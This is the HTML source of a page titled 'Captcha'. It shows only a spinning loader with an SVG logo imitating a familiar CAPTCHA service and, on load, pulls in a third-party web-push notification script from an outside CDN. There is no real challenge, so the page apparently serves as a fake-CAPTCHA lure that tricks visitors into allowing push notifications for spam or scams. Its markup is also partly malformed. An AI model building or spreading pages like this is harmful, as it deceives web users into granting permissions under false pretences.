<!DOCTYPE html>
<html>
     <head>    
          <title>Captcha</title>
         
          <meta charset="UTF-8">
          <meta name="referrer" content="no-referrer" >    
          <script type="text/javascript" src="https://cdn.hullcode.com/webpush/js/pushwebServiceSDK.js"></script>


      <style type="text/css">

   *{  margin: 0;    
       padding: 0;    
           }    
            
       
          
      .spinner-w {            
       width: 64px;        
       height: 64px;        
       position: absolute;        
       top: 50%;        
       margin-top: -32px;        
       left: 50%;        
       margin-left: -32px;    
     }
         
       p {        
       padding-bottom: 5px;    
     }

      .circle-icon {        
       width: 64px;        
       height: 64px;    
     }
    
        
      .rotateIn { 
      -webkit-animation-name: 
      rotateIn; animation-name: rotateIn; 
      -webkit-animation-duration: 2s; 
      animation-duration: 2s; 
      -webkit-animation-fill-mode: both; 
      animation-fill-mode: both; 
      animation-iteration-count: infinite; 
   } 
      @-webkit-keyframes rotateIn { 0% {         
      -webkit-transform-origin: center;         
      transform-origin: center;         
      -webkit-transform: rotate3d(0, 0, 1, -360deg);         
      transform: rotate3d(0, 0, 1, -360deg);     
      } 100% {          
    
      -webkit-transform-origin: center;         
      transform-origin: center;         
      -webkit-transform: none;         
      transform: none;     
      
     } 
   } 
    
      @keyframes rotateIn { 0% {         
     -webkit-transform-origin: center;         
      transform-origin: center;         
     -webkit-transform: rotate3d(0, 0, 1, -360deg);         
      transform: rotate3d(0, 0, 1, -360deg);     
    } 100% {         
     -webkit-transform-origin: center;         
     transform-origin: center;        
    -webkit-transform: none;         
     transform: none;     
    } 
  } 
</style>


    <body> 
        
         <div class="spinner-w">        
         <div class="circle-icon rotateIn">            
                                        
         <svg version="1.1" id="Capa_1" xmlns="ยก" xmlns:xlink="" x="0px" y="0px"    viewBox="0 0 874.8 874.8" style="enable-background:new 0 0 874.8 874.8;" xml:space="preserve">            
                                                    <style type="text/css">                
                                                                .st0{fill:#1C3AA9;}                
                                                                .st1{fill:#4285F4;}                
                                                                .st2{fill:#ABABAB;}            
                                                
 </style>            
          
    <g>
      <path class="st0" d="M874.8,435.5c0-6.3-0.2-12.5-0.4-18.7v-354l-97.9,97.9C696.4,62.6,574.5,0,438.1,0                    c-142,0-268.2,67.8-348,172.8l160.4,162.1c15.7-29.1,38.1-54,65-72.9c28-21.9,67.7-39.7,122.6-39.7c6.6,0,11.7,0.8,15.5,2.2                    c68,5.4,127,42.9,161.7,97.4L501.7,435.4C645.5,434.8,808,434.5,874.8,435.5"/>                

      <path class="st1" d="M435.5,0c-6.3,0-12.5,0.2-18.7,0.4h-354l97.9,97.9C62.6,178.4,0,300.3,0,436.8c0,142,67.8,268.2,172.8,348                    l162.1-160.4c-29.1-15.7-54-38.1-72.9-65c-21.9-28-39.7-67.7-39.7-122.6c0-6.6,0.8-11.7,2.2-15.5c5.4-68,42.9-127,97.4-161.7                    l113.5,113.5C434.8,229.3,434.5,66.8,435.5,0"/>                
                                                                                            
      <path class="st2" d="M0,436.7c0,6.3,0.2,12.5,0.4,18.7v354l97.9-97.9c80.1,98,201.9,160.7,338.4,160.7c142,0,268.2-67.8,348-172.8                    L624.3,537.4c-15.7,29.1-38.1,54-65,72.9c-28,21.9-67.7,39.7-122.6,39.7c-6.6,0-11.7-0.8-15.5-2.2c-68-5.4-127-42.9-161.7-97.4                    l113.5-113.5C229.3,437.4,66.8,437.7,0,436.7"/>
   
 </g>                
</svg>


    
